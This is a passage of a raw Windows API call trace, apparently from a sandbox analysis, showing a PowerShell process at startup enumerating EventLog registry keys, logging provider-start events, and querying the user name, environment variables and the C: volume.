	[0061.477] RegEnumKeyExW (in: hKey=0x674, dwIndex=0x1, lpName=0x233e12d9b70, lpcchName=0x350027a718, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x350027a718, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0061.477] CoTaskMemFree (pv=0x233e12d9b70) 
	[0061.477] CoTaskMemFree (pv=0x0) 
	[0061.477] CoTaskMemAlloc (cb=0x204) returned 0x233e12d9b70
	[0061.477] RegEnumKeyExW (in: hKey=0x674, dwIndex=0x2, lpName=0x233e12d9b70, lpcchName=0x350027a718, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x350027a718, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0061.477] CoTaskMemFree (pv=0x233e12d9b70) 
	[0061.477] CoTaskMemFree (pv=0x0) 
	[0061.477] CoTaskMemAlloc (cb=0x204) returned 0x233e12d9b70
	[0061.477] RegEnumKeyExW (in: hKey=0x674, dwIndex=0x3, lpName=0x233e12d9b70, lpcchName=0x350027a718, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x350027a718, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0061.477] CoTaskMemFree (pv=0x233e12d9b70) 
	[0061.477] CoTaskMemFree (pv=0x0) 
	[0061.477] CoTaskMemAlloc (cb=0x204) returned 0x233e12d9b70
	[0061.477] RegEnumKeyExW (in: hKey=0x674, dwIndex=0x4, lpName=0x233e12d9b70, lpcchName=0x350027a718, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x350027a718, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0061.477] CoTaskMemFree (pv=0x233e12d9b70) 
	[0061.477] CoTaskMemFree (pv=0x0) 
	[0061.477] CoTaskMemAlloc (cb=0x204) returned 0x233e12d9b70
	[0061.477] RegEnumKeyExW (in: hKey=0x674, dwIndex=0x5, lpName=0x233e12d9b70, lpcchName=0x350027a718, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x350027a718, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0061.478] CoTaskMemFree (pv=0x233e12d9b70) 
	[0061.478] CoTaskMemFree (pv=0x0) 
	[0061.478] CoTaskMemAlloc (cb=0x204) returned 0x233e12d9b70
	[0061.478] RegEnumKeyExW (in: hKey=0x674, dwIndex=0x6, lpName=0x233e12d9b70, lpcchName=0x350027a718, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x350027a718, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0061.478] CoTaskMemFree (pv=0x233e12d9b70) 
	[0061.478] CoTaskMemFree (pv=0x0) 
	[0061.478] CoTaskMemAlloc (cb=0x204) returned 0x233e12d9b70
	[0061.478] RegEnumKeyExW (in: hKey=0x674, dwIndex=0x7, lpName=0x233e12d9b70, lpcchName=0x350027a718, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x350027a718, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0061.478] CoTaskMemFree (pv=0x233e12d9b70) 
	[0061.478] CoTaskMemFree (pv=0x0) 
	[0061.478] RegOpenKeyExW (in: hKey=0x674, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a778 | out: phkResult=0x350027a778*=0x65c) returned 0x0
	[0061.478] RegOpenKeyExW (in: hKey=0x65c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a778 | out: phkResult=0x350027a778*=0x0) returned 0x2
	[0061.478] RegOpenKeyExW (in: hKey=0x674, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a778 | out: phkResult=0x350027a778*=0x678) returned 0x0
	[0061.478] RegOpenKeyExW (in: hKey=0x678, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a778 | out: phkResult=0x350027a778*=0x0) returned 0x2
	[0061.478] RegOpenKeyExW (in: hKey=0x674, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a778 | out: phkResult=0x350027a778*=0x67c) returned 0x0
	[0061.478] RegOpenKeyExW (in: hKey=0x67c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a778 | out: phkResult=0x350027a778*=0x0) returned 0x2
	[0061.478] RegOpenKeyExW (in: hKey=0x674, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a778 | out: phkResult=0x350027a778*=0x680) returned 0x0
	[0061.478] RegOpenKeyExW (in: hKey=0x680, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a778 | out: phkResult=0x350027a778*=0x0) returned 0x2
	[0061.478] RegOpenKeyExW (in: hKey=0x674, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a778 | out: phkResult=0x350027a778*=0x684) returned 0x0
	[0061.478] RegOpenKeyExW (in: hKey=0x684, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a778 | out: phkResult=0x350027a778*=0x0) returned 0x2
	[0061.478] RegOpenKeyExW (in: hKey=0x674, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a778 | out: phkResult=0x350027a778*=0x0) returned 0x5
	[0061.480] RegOpenKeyExW (in: hKey=0x674, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a778 | out: phkResult=0x350027a778*=0x688) returned 0x0
	[0061.480] RegOpenKeyExW (in: hKey=0x688, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a778 | out: phkResult=0x350027a778*=0x0) returned 0x2
	[0061.480] RegOpenKeyExW (in: hKey=0x674, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a778 | out: phkResult=0x350027a778*=0x68c) returned 0x0
	[0061.480] RegOpenKeyExW (in: hKey=0x68c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a778 | out: phkResult=0x350027a778*=0x690) returned 0x0
	[0061.480] RegCloseKey (hKey=0x690) returned 0x0
	[0061.481] RegCloseKey (hKey=0x674) returned 0x0
	[0061.481] RegCloseKey (hKey=0x68c) returned 0x0
	[0061.482] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a6e8 | out: phkResult=0x350027a6e8*=0x68c) returned 0x0
	[0061.482] RegQueryInfoKeyW (in: hKey=0x68c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x350027a65c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x350027a658, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x350027a65c*=0x8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x350027a658*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0061.482] CoTaskMemFree (pv=0x0) 
	[0061.482] CoTaskMemAlloc (cb=0x204) returned 0x233e12d9b70
	[0061.482] RegEnumKeyExW (in: hKey=0x68c, dwIndex=0x0, lpName=0x233e12d9b70, lpcchName=0x350027a6e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x350027a6e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0061.482] CoTaskMemFree (pv=0x233e12d9b70) 
	[0061.482] CoTaskMemFree (pv=0x0) 
	[0061.482] CoTaskMemAlloc (cb=0x204) returned 0x233e12d9b70
	[0061.482] RegEnumKeyExW (in: hKey=0x68c, dwIndex=0x1, lpName=0x233e12d9b70, lpcchName=0x350027a6e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x350027a6e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0061.482] CoTaskMemFree (pv=0x233e12d9b70) 
	[0061.482] CoTaskMemFree (pv=0x0) 
	[0061.482] CoTaskMemAlloc (cb=0x204) returned 0x233e12da5c0
	[0061.482] RegEnumKeyExW (in: hKey=0x68c, dwIndex=0x2, lpName=0x233e12da5c0, lpcchName=0x350027a6e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x350027a6e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0061.482] CoTaskMemFree (pv=0x233e12da5c0) 
	[0061.482] CoTaskMemFree (pv=0x0) 
	[0061.482] CoTaskMemAlloc (cb=0x204) returned 0x233e12d9b70
	[0061.482] RegEnumKeyExW (in: hKey=0x68c, dwIndex=0x3, lpName=0x233e12d9b70, lpcchName=0x350027a6e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x350027a6e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0061.483] CoTaskMemFree (pv=0x233e12d9b70) 
	[0061.483] CoTaskMemFree (pv=0x0) 
	[0061.483] CoTaskMemAlloc (cb=0x204) returned 0x233e12d9b70
	[0061.483] RegEnumKeyExW (in: hKey=0x68c, dwIndex=0x4, lpName=0x233e12d9b70, lpcchName=0x350027a6e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x350027a6e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0061.483] CoTaskMemFree (pv=0x233e12d9b70) 
	[0061.483] CoTaskMemFree (pv=0x0) 
	[0061.483] CoTaskMemAlloc (cb=0x204) returned 0x233e12d9f90
	[0061.483] RegEnumKeyExW (in: hKey=0x68c, dwIndex=0x5, lpName=0x233e12d9f90, lpcchName=0x350027a6e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x350027a6e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0061.483] CoTaskMemFree (pv=0x233e12d9f90) 
	[0061.483] CoTaskMemFree (pv=0x0) 
	[0061.483] CoTaskMemAlloc (cb=0x204) returned 0x233e12d9b70
	[0061.483] RegEnumKeyExW (in: hKey=0x68c, dwIndex=0x6, lpName=0x233e12d9b70, lpcchName=0x350027a6e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x350027a6e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0061.483] CoTaskMemFree (pv=0x233e12d9b70) 
	[0061.483] CoTaskMemFree (pv=0x0) 
	[0061.483] CoTaskMemAlloc (cb=0x204) returned 0x233e12da5c0
	[0061.483] RegEnumKeyExW (in: hKey=0x68c, dwIndex=0x7, lpName=0x233e12da5c0, lpcchName=0x350027a6e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x350027a6e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0061.483] CoTaskMemFree (pv=0x233e12da5c0) 
	[0061.483] CoTaskMemFree (pv=0x0) 
	[0061.483] RegOpenKeyExW (in: hKey=0x68c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a748 | out: phkResult=0x350027a748*=0x674) returned 0x0
	[0061.483] RegOpenKeyExW (in: hKey=0x674, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a748 | out: phkResult=0x350027a748*=0x0) returned 0x2
	[0061.484] RegOpenKeyExW (in: hKey=0x68c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a748 | out: phkResult=0x350027a748*=0x690) returned 0x0
	[0061.484] RegOpenKeyExW (in: hKey=0x690, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a748 | out: phkResult=0x350027a748*=0x0) returned 0x2
	[0061.484] RegOpenKeyExW (in: hKey=0x68c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a748 | out: phkResult=0x350027a748*=0x694) returned 0x0
	[0061.484] RegOpenKeyExW (in: hKey=0x694, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a748 | out: phkResult=0x350027a748*=0x0) returned 0x2
	[0061.484] RegOpenKeyExW (in: hKey=0x68c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a748 | out: phkResult=0x350027a748*=0x698) returned 0x0
	[0061.484] RegOpenKeyExW (in: hKey=0x698, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a748 | out: phkResult=0x350027a748*=0x0) returned 0x2
	[0061.484] RegOpenKeyExW (in: hKey=0x68c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a748 | out: phkResult=0x350027a748*=0x69c) returned 0x0
	[0061.484] RegOpenKeyExW (in: hKey=0x69c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a748 | out: phkResult=0x350027a748*=0x0) returned 0x2
	[0061.484] RegOpenKeyExW (in: hKey=0x68c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a748 | out: phkResult=0x350027a748*=0x0) returned 0x5
	[0061.486] RegOpenKeyExW (in: hKey=0x68c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a748 | out: phkResult=0x350027a748*=0x6a0) returned 0x0
	[0061.486] RegOpenKeyExW (in: hKey=0x6a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a748 | out: phkResult=0x350027a748*=0x0) returned 0x2
	[0061.486] RegOpenKeyExW (in: hKey=0x68c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a748 | out: phkResult=0x350027a748*=0x6a4) returned 0x0
	[0061.486] RegOpenKeyExW (in: hKey=0x6a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a748 | out: phkResult=0x350027a748*=0x6a8) returned 0x0
	[0061.486] RegCloseKey (hKey=0x6a8) returned 0x0
	[0061.486] RegCloseKey (hKey=0x68c) returned 0x0
	[0061.486] RegCloseKey (hKey=0x6a4) returned 0x0
	[0061.496] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x233e3810018
	[0061.504] ReportEventW (hEventLog=0x233e3810018, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x233e4179f10*="WSMan", lpRawData=0x233e4179c80) returned 1
	[0061.508] CoTaskMemAlloc (cb=0x104) returned 0x233e39e8da0
	[0061.508] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.508] CoTaskMemFree (pv=0x233e39e8da0) 
	[0061.509] CoTaskMemAlloc (cb=0x804) returned 0x233e1210860
	[0061.509] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x233e1210860, nSize=0x350027a9d8 | out: lpNameBuffer="X2VS1CUM\\Nd9E1FYi", nSize=0x350027a9d8) returned 0x1
	[0061.509] CoTaskMemFree (pv=0x233e1210860) 
	[0061.509] CoTaskMemAlloc (cb=0x204) returned 0x233e12d9b70
	[0061.509] GetUserNameW (in: lpBuffer=0x233e12d9b70, pcbBuffer=0x350027aa18 | out: lpBuffer="Nd9E1FYi", pcbBuffer=0x350027aa18) returned 1
	[0061.510] CoTaskMemFree (pv=0x233e12d9b70) 
	[0061.510] ReportEventW (hEventLog=0x233e3810018, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x233e417f528*="Alias", lpRawData=0x233e417f2b8) returned 1
	[0061.510] CoTaskMemAlloc (cb=0x104) returned 0x233e39e8b80
	[0061.510] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e8b80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.510] CoTaskMemFree (pv=0x233e39e8b80) 
	[0061.511] CoTaskMemAlloc (cb=0x804) returned 0x233e1210860
	[0061.511] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x233e1210860, nSize=0x350027a9d8 | out: lpNameBuffer="X2VS1CUM\\Nd9E1FYi", nSize=0x350027a9d8) returned 0x1
	[0061.512] CoTaskMemFree (pv=0x233e1210860) 
	[0061.512] CoTaskMemAlloc (cb=0x204) returned 0x233e12d9b70
	[0061.512] GetUserNameW (in: lpBuffer=0x233e12d9b70, pcbBuffer=0x350027aa18 | out: lpBuffer="Nd9E1FYi", pcbBuffer=0x350027aa18) returned 1
	[0061.512] CoTaskMemFree (pv=0x233e12d9b70) 
	[0061.512] ReportEventW (hEventLog=0x233e3810018, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x233e4184c00*="Environment", lpRawData=0x233e4184990) returned 1
	[0061.513] CoTaskMemAlloc (cb=0x104) returned 0x233e39e9840
	[0061.513] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e9840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.513] CoTaskMemFree (pv=0x233e39e9840) 
	[0061.513] CoTaskMemAlloc (cb=0x104) returned 0x233e39e80e0
	[0061.513] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x233e39e80e0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0061.513] CoTaskMemFree (pv=0x233e39e80e0) 
	[0061.513] CoTaskMemAlloc (cb=0x104) returned 0x233e39e8da0
	[0061.513] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x233e39e8da0, nSize=0x80 | out: lpBuffer="\\Users\\Nd9E1FYi") returned 0xf
	[0061.513] CoTaskMemFree (pv=0x233e39e8da0) 
	[0061.514] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi", nBufferLength=0x105, lpBuffer=0x350027a580, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi", lpFilePart=0x0) returned 0x11
	[0061.514] SetErrorMode (uMode=0x1) returned 0x8001
	[0061.514] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi" (normalized: "c:\\users\\nd9e1fyi"), fInfoLevelId=0x0, lpFileInformation=0x350027a790 | out: lpFileInformation=0x350027a790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f5eb76f, ftCreationTime.dwHighDateTime=0x1d30b90, ftLastAccessTime.dwLowDateTime=0x78452c50, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x78452c50, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0061.514] SetErrorMode (uMode=0x8001) returned 0x1
	[0061.515] GetLogicalDrives () returned 0x2000004
	[0061.516] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x350027a2f0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0061.517] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0061.517] SetErrorMode (uMode=0x1) returned 0x8001
	[0061.517] CoTaskMemAlloc (cb=0x68) returned 0x233e3a07fb0
	[0061.517] CoTaskMemAlloc (cb=0x68) returned 0x233e3a081e0
	[0061.517] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x233e3a07fb0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x350027a760, lpMaximumComponentLength=0x350027a75c, lpFileSystemFlags=0x350027a758, lpFileSystemNameBuffer=0x233e3a081e0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x350027a760*=0xa283c81, lpMaximumComponentLength=0x350027a75c*=0xff, lpFileSystemFlags=0x350027a758*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0061.518] CoTaskMemFree (pv=0x233e3a07fb0) 
	[0061.518] CoTaskMemFree (pv=0x233e3a081e0) 
	[0061.518] SetErrorMode (uMode=0x8001) returned 0x1
	[0061.518] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0061.519] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x350027a4a0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0061.519] SetErrorMode (uMode=0x1) returned 0x8001
	[0061.519] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x350027a700 | out: lpFileInformation=0x350027a700*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x31b3b9e4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x95a116d6, ftLastAccessTime.dwHighDateTime=0x1d3a57f, ftLastWriteTime.dwLowDateTime=0x95a116d6, ftLastWriteTime.dwHighDateTime=0x1d3a57f, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0061.519] SetErrorMode (uMode=0x8001) returned 0x1
	[0061.522] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x350027a4a0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0061.522] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x350027a280, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0061.523] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x350027a2d0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0061.523] SetErrorMode (uMode=0x1) returned 0x8001
	[0061.523] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x350027a530 | out: lpFileInformation=0x350027a530*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x31b3b9e4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x95a116d6, ftLastAccessTime.dwHighDateTime=0x1d3a57f, ftLastWriteTime.dwLowDateTime=0x95a116d6, ftLastWriteTime.dwHighDateTime=0x1d3a57f, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0061.523] SetErrorMode (uMode=0x8001) returned 0x1
	[0061.523] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x350027a2d0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0061.523] SetErrorMode (uMode=0x1) returned 0x8001
	[0061.523] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x350027a530 | out: lpFileInformation=0x350027a530*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x31b3b9e4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x95a116d6, ftLastAccessTime.dwHighDateTime=0x1d3a57f, ftLastWriteTime.dwLowDateTime=0x95a116d6, ftLastWriteTime.dwHighDateTime=0x1d3a57f, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0061.523] SetErrorMode (uMode=0x8001) returned 0x1
	[0061.523] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x350027a370, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0061.524] SetErrorMode (uMode=0x1) returned 0x8001
	[0061.524] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x350027a5d0 | out: lpFileInformation=0x350027a5d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x31b3b9e4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x95a116d6, ftLastAccessTime.dwHighDateTime=0x1d3a57f, ftLastWriteTime.dwLowDateTime=0x95a116d6, ftLastWriteTime.dwHighDateTime=0x1d3a57f, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0061.524] SetErrorMode (uMode=0x8001) returned 0x1
	[0061.524] CoTaskMemAlloc (cb=0x804) returned 0x233e1210860
	[0061.524] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x233e1210860, nSize=0x350027a9d8 | out: lpNameBuffer="X2VS1CUM\\Nd9E1FYi", nSize=0x350027a9d8) returned 0x1
	[0061.524] CoTaskMemFree (pv=0x233e1210860) 
	[0061.524] CoTaskMemAlloc (cb=0x204) returned 0x233e12d9b70
	[0061.524] GetUserNameW (in: lpBuffer=0x233e12d9b70, pcbBuffer=0x350027aa18 | out: lpBuffer="Nd9E1FYi", pcbBuffer=0x350027aa18) returned 1
	[0061.524] CoTaskMemFree (pv=0x233e12d9b70) 
	[0061.525] ReportEventW (hEventLog=0x233e3810018, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x233e418cb48*="FileSystem", lpRawData=0x233e418c8d8) returned 1
	[0061.525] CoTaskMemAlloc (cb=0x104) returned 0x233e39e8eb0
	[0061.525] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e8eb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.525] CoTaskMemFree (pv=0x233e39e8eb0) 
	[0061.526] CoTaskMemAlloc (cb=0x804) returned 0x233e1210860
	[0061.526] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x233e1210860, nSize=0x350027a9d8 | out: lpNameBuffer="X2VS1CUM\\Nd9E1FYi", nSize=0x350027a9d8) returned 0x1
	[0061.526] CoTaskMemFree (pv=0x233e1210860) 
	[0061.526] CoTaskMemAlloc (cb=0x204) returned 0x233e12dabf0
	[0061.526] GetUserNameW (in: lpBuffer=0x233e12dabf0, pcbBuffer=0x350027aa18 | out: lpBuffer="Nd9E1FYi", pcbBuffer=0x350027aa18) returned 1
	[0061.526] CoTaskMemFree (pv=0x233e12dabf0) 
	[0061.527] ReportEventW (hEventLog=0x233e3810018, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x233e4192468*="Function", lpRawData=0x233e41921f8) returned 1
	[0061.527] CoTaskMemAlloc (cb=0x104) returned 0x233e39e9840
	[0061.527] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e9840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.527] CoTaskMemFree (pv=0x233e39e9840) 
	[0061.601] CoTaskMemAlloc (cb=0x804) returned 0x233e1210860
	[0061.601] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x233e1210860, nSize=0x350027a9d8 | out: lpNameBuffer="X2VS1CUM\\Nd9E1FYi", nSize=0x350027a9d8) returned 0x1
	[0061.601] CoTaskMemFree (pv=0x233e1210860) 
	[0061.601] CoTaskMemAlloc (cb=0x204) returned 0x233e12d9b70
	[0061.601] GetUserNameW (in: lpBuffer=0x233e12d9b70, pcbBuffer=0x350027aa18 | out: lpBuffer="Nd9E1FYi", pcbBuffer=0x350027aa18) returned 1
	[0061.601] CoTaskMemFree (pv=0x233e12d9b70) 
	[0061.602] ReportEventW (hEventLog=0x233e3810018, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x233e41b4d60*="Registry", lpRawData=0x233e41b4af0) returned 1
	[0061.603] CoTaskMemAlloc (cb=0x804) returned 0x233e1210860
	[0061.603] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x233e1210860, nSize=0x350027a9d8 | out: lpNameBuffer="X2VS1CUM\\Nd9E1FYi", nSize=0x350027a9d8) returned 0x1
	[0061.604] CoTaskMemFree (pv=0x233e1210860) 
	[0061.604] CoTaskMemAlloc (cb=0x204) returned 0x233e12d9b70
	[0061.604] GetUserNameW (in: lpBuffer=0x233e12d9b70, pcbBuffer=0x350027aa18 | out: lpBuffer="Nd9E1FYi", pcbBuffer=0x350027aa18) returned 1
